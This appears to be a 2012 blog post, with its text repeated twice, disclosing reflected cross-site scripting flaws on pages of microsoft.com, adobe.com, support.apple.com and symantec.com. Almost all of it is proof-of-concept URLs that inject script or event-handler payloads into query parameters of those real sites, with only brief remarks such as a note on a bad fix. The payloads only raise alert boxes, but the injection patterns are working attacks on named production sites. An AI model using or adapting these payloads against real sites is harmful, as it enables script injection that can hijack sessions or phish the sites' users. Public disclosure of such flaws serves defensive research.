Twitter Go on Twitter

Cross-site scripting vulnerabilities in Microsoft,Adobe,Apple and Symantec web sites

Cross-site scripting vulnerability in microsoft.com





Bad fix from Microsoft,the page was xssed for the first time on 07.03.2012(mirror) and today is still vulnerable...

PoC:

http://www.microsoft.com/en-us/together/possibilities.aspx?a='"--></style><script>confirm(/BAD FIX!/.source);/&b=*/</script>

Cross-site scripting vulnerability in adobe.com




PoC:


https://www.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type="><img src=x: onerror=alert(String.fromCharCode(74,117,115,116,32,97,32,88,83,83,46,46,46))>&code=blackletter&cat=style

Cross-site scripting vulnerability in support.apple.com




PoC:


http://support.apple.com/kb/index?page=servicefaq&geo='-alert('xss')-'&product=ipad


Cross-site scripting vulnerability in symantec.com




PoC:


http://www.symantec.com/business/support/index?page=landing&key='-confirm('xss')-'&locale=en_us



Blog

17 March 2012

Cross-site scripting vulnerabilities in Microsoft,Adobe,Apple and Symantec web sites

at 5:53 PM
Cross-site scripting vulnerability in microsoft.com





Bad fix from Microsoft,the page was xssed for the first time on 07.03.2012(mirror) and today is still vulnerable...

PoC:

http://www.microsoft.com/en-us/together/possibilities.aspx?a='"--></style><script>confirm(/BAD FIX!/.source);/&b=*/</script>

Cross-site scripting vulnerability in adobe.com




PoC:


https://www.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type="><img src=x: onerror=alert(String.fromCharCode(74,117,115,116,32,97,32,88,83,83,46,46,46))>&code=blackletter&cat=style

Cross-site scripting vulnerability in support.apple.com




PoC:


http://support.apple.com/kb/index?page=servicefaq&geo='-alert('xss')-'&product=ipad


Cross-site scripting vulnerability in symantec.com




PoC:


http://www.symantec.com/business/support/index?page=landing&key='-confirm('xss')-'&locale=en_us